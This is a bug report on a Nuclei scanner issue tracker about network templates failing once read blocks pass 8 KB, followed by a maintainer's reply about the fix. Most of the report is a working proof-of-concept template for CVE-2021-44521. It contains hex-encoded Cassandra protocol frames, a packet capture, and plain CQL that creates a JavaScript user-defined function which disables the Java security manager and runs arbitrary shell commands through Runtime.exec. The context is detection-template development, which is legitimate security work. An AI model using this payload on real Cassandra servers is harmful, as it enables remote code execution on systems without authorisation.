When processing network requests, if read block more than 1024*8,will be error.

[Y4er]

Nuclei version:

Current Version: 2.6.0

Current Behavior:

When the read data exceeds 1024*8, the debug mode does not display the response, and the requested data and order are not correct.

Expected Behavior:

When there are 9 read blocks, the corresponding response can be read.

Steps To Reproduce:

I am writing a poc template about CVE-2021-44521,my local env is Cassandra 4.0.0 and set enable_user_defined_functions_threads: false in cassandra.yaml.

and this is my poc:

id: CVE-2021-44521

info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er
  description: Apache Cassandra Load UDF RCE
  severity: critical
  reference: https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
  tags: network,rce,apache,Cassandra,CVE-2021-44521,cve

network:
  - inputs:
      - data: "050000000500000000"
        read: 1024
        type: hex
      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        read: 1024
        type: hex
      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        read: 1024
        type: hex
      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        read: 1024
        type: hex
      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        read: 1024
        type: hex
      - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
        read: 1024
        type: hex
      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        read: 1024
        type: hex
      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        read: 1024
        type: hex
      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        # The problem occurs if I uncomment the next line.
        # read: 1024
    host:
      - "{{Hostname}}:9042"
    # next line also doesn't work.
    # read-all: true
    matchers:
      - type: word
        words:
          - "123123"
        part: raw

if i comment the last read: 1024 block, will be success. use network-fingerprint result like this

[root@localhost ~]# ./network-fingerprint -port 9042 -iface ens33
2022/02/16 22:51:01 network-fingerprint: nuclei-helper by @pdiscoveryio
2022/02/16 22:51:02 [device] ens33 IP: 172.16.16.9
2022/02/16 22:51:02 [device] lo IP: 127.0.0.1
{
  "data": "\u0005\u0000\u0000\u0000\u0005\u0000\u0000\u0000\u0000",
  "hex": "050000000500000000",
  "request": true
}
{
  "data": "\ufffd\u0000\u0000\u0000\u0006\u0000\u0000\u0000f\u0000\u0003\u0000\u0011PROTOCOL_VERSIONS\u0000\u0004\u0000\u00043/v3\u0000\u00044/v4\u0000\u00045/v5\u0000\t6/v6-beta\u0000\u000bCOMPRESSION\u0000\u0002\u0000\u0006snappy\u0000\u0003lz4\u0000\u000bCQL_VERSION\u0000\u0001\u0000\u00053.4.5",
  "hex": "8500000006000000660003001150524f544f434f4c5f56455253494f4e5300040004332f76330004342f76340004352f76350009362f76362d62657461000b434f4d5052455353494f4e00020006736e6170707900036c7a34000b43514c5f56455253494f4e00010005332e342e35",
  "response": true
}
{
  "data": "\u0005\u0000\u0000\u0001\u0001\u0000\u0000\u0000S\u0000\u0003\u0000\u000bDRIVER_NAME\u0000\u0016DataStax Python Driver\u0000\u000eDRIVER_VERSION\u0000\u00063.25.0\u0000\u000bCQL_VERSION\u0000\u00053.4.5",
  "hex": "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35",
  "request": true
}
{
  "data": "\ufffd\u0000\u0000\u0001\u0002\u0000\u0000\u0000\u0000",
  "hex": "850000010200000000",
  "response": true
}
{
  "data": "\u003e\u0000\u0002\u0018\ufffd\ufffd\u0005\u0000\u0000\u0003\u0007\u0000\u0000\u00005\u0000\u0000\u0000\u001ddrop KEYSPACE IF EXISTS test;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd\u000eO\ufffdތ\n",
  "hex": "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a",
  "request": true
}
{
  "data": "\r\u0000\u0002\ufffd\u0007\ufffd\ufffd\u0000\u0000\u0003\u0008\u0000\u0000\u0000\u0004\u0000\u0000\u0000\u0001#\ufffd@\ufffd",
  "hex": "0d0002cf07f785000003080000000400000001239340f9",
  "response": true
}
{
  "data": "\u0000\u0002\ufffd\ufffd\ufffd\u0005\u0000\u0000\u0004\u0007\u0000\u0000\u0000v\u0000\u0000\u0000^CREATE KEYSPACE test WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 1};\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd9\u000f\r\ufffd\ufffdk",
  "hex": "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b",
  "request": true
}
{
  "data": "\u0026\u0000\u0002b\r\u0003\ufffd\u0000\u0000\u0004\u0008\u0000\u0000\u0000\u001d\u0000\u0000\u0000\u0005\u0000\u0007CREATED\u0000\u0008KEYSPACE\u0000\u0004testx\ufffdVY",
  "hex": "260002620d0385000004080000001d0000000500074352454154454400084b4559535041434500047465737478915659",
  "response": true
}
{
  "data": "}\u0000\u0002\ufffdfO\u0005\u0000\u0000\u0008\u0007\u0000\u0000\u0000t\u0000\u0000\u0000\\CREATE TABLE test.rce (cmd varchar PRIMARY KEY) WITH comment='Important biological records';\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd/\ufffda\ufffd\u0015\u0010",
  "hex": "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510",
  "request": true
}
{
  "data": "(\u0000\u0002\ufffd\u0000\u0000\u0008\u0008\u0000\u0000\u0000\u001f\u0000\u0000\u0000\u0005\u0000\u0007CREATED\u0000\u0005TABLE\u0000\u0004test\u0000\u0003rce\ufffd[\u0008\ufffd",
  "hex": "280002ef9c8885000008080000001f0000000500074352454154454400055441424c450004746573740003726365bb5b08db",
  "response": true
}
{
  "data": "\u001c\u0003\u0002\ufffd\ufffd4\u0005\u0000\u0000\u0010\u0007\u0000\u0000\u0003\u0013\u0000\u0000\u0002\ufffdcreate or replace FUNCTION test.exec( cmd text )\r\n    RETURNS NULL ON NULL INPUT\r\n    RETURNS text\r\n    LANGUAGE javascript\r\n    AS $$\r\n    var System = Java.type(\"java.lang.System\");System.setSecurityManager(null);\r\n    var e =this.engine.factory.scriptEngine.eval('var osname = java.lang.System.getProperty(\"os.name\");osname = osname.toLowerCase();var split = osname.startsWith(\"win\") ? \"/c\" : \"-c\";var cmdPath = osname.startsWith(\"win\") ? \"cmd\" : \"bash\";var command = \"'+cmd+'\";var s = [cmdPath, split, command];p = java.lang.Runtime.getRuntime().exec(s);var br = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));var res=\"\";while ((l = br.readLine()) != null) {    res+=l;res+=java.lang.System.lineSeparator();}');\r\n    e;\r\n    $$;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd~Ήdl\ufffd",
  "hex": "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85",
  "request": true
}
{
  "data": "4\u0000\u0002\ufffd\ufffd\u0008\ufffd\u0000\u0000\u0010\u0008\u0000\u0000\u0000+\u0000\u0000\u0000\u0005\u0000\u0007CREATED\u0000\u0008FUNCTION\u0000\u0004test\u0000\u0004exec\u0000\u0001\u0000\u0004text\ufffd1\u0000,",
  "hex": "340002fef00885000010080000002b00000005000743524541544544000846554e4354494f4e0004746573740004657865630001000474657874a131002c",
  "response": true
}
{
  "data": "Q\u0000\u0002x\u00035\u0005\u0000\u0000\u0014\u0007\u0000\u0000\u0000H\u0000\u0000\u00000insert into test.rce(cmd) values('echo 123123');\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd[\ufffd\u000e\ufffd\ufffdn",
  "hex": "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e",
  "request": true
}
{
  "data": "\r\u0000\u0002\ufffd\u0007\ufffd\ufffd\u0000\u0000\u0014\u0008\u0000\u0000\u0000\u0004\u0000\u0000\u0000\u0001\ufffd\t2\u003c",
  "hex": "0d0002cf07f785000014080000000400000001b209323c",
  "response": true
}
{
  "data": "E\u0000\u0002\ufffd\ufffd\ufffd\u0005\u0000\u0000\u0015\u0007\u0000\u0000\u0000\u003c\u0000\u0000\u0000$select test.exec(cmd) from test.rce;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd͙\ufffdD'\u0012\ufffd",
  "hex": "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281",
  "request": true
}
{
  "data": "A\u0000\u0002\ufffd\u003e\ufffd\ufffd\u0000\u0000\u0015\u0008\u0000\u0000\u00008\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0001\u0000\u0004test\u0000\u0003rce\u0000\u000etest.exec(cmd)\u0000\r\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0007123123\n\u0005\ufffdO\u0026",
  "hex": "410002d43eee8500001508000000380000000200000001000000010004746573740003726365000e746573742e6578656328636d6429000d00000001000000073132333132330a05ed4f26",
  "response": true
}
{
  "data": "\u003e\u0000\u0002\u0018\ufffd\ufffd\u0005\u0000\u0000\u0003\u0007\u0000\u0000\u00005\u0000\u0000\u0000\u001ddrop KEYSPACE IF EXISTS test;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd\u000eO\ufffdތ\n",
  "hex": "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a",
  "request": true
}
{
  "data": "\u0026\u0000\u0002b\r\u0003\ufffd\u0000\u0000\u0003\u0008\u0000\u0000\u0000\u001d\u0000\u0000\u0000\u0005\u0000\u0007DROPPED\u0000\u0008KEYSPACE\u0000\u0004test\ufffd\ufffdY\ufffd",
  "hex": "260002620d0385000003080000001d00000005000744524f5050454400084b45595350414345000474657374e7f15981",
  "response": true
}

request will send sql to create udf in cassandra. sql is this

drop KEYSPACE IF EXISTS test;
CREATE KEYSPACE test WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 1};
CREATE TABLE test.rce (cmd varchar PRIMARY KEY) WITH comment='Important biological records';
create or replace FUNCTION test.exec( cmd text )
    RETURNS NULL ON NULL INPUT
    RETURNS text
    LANGUAGE javascript
    AS $$
    var System = Java.type("java.lang.System");System.setSecurityManager(null);
    var e =this.engine.factory.scriptEngine.eval('var osname = java.lang.System.getProperty("os.name");osname = osname.toLowerCase();var split = osname.startsWith("win") ? "/c" : "-c";var cmdPath = osname.startsWith("win") ? "cmd" : "bash";var command = "'+cmd+'";var s = [cmdPath, split, command];p = java.lang.Runtime.getRuntime().exec(s);var br = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));var res="";while ((l = br.readLine()) != null) {    res+=l;res+=java.lang.System.lineSeparator();}');
    e;
    $$;
insert into test.rce(cmd) values('echo 123123');
select test.exec(cmd) from test.rce;
drop KEYSPACE test;

debug mode result is this

but if i uncomment last read block, no response info to display for me.

i guess maybe nuclei set max buffer for socket recived response?

when read block more than 1024*8, no response to display.

Anything else:

about CVE-2021-44521,you can read these post:

1. https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
2. https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/

[Ice3man543]

@Y4er Thank you for reporting the issue. I was able to reproduce the problem and trace the issue to the error handling code responsible for dealing with network related errors during reading. The problem was the errors occurring during reading weren't being propagated to the user, and since the server had no response to send, the connection was timing out which caused nuclei to exit without any response. A fix has been created and this should be fixed with the next release.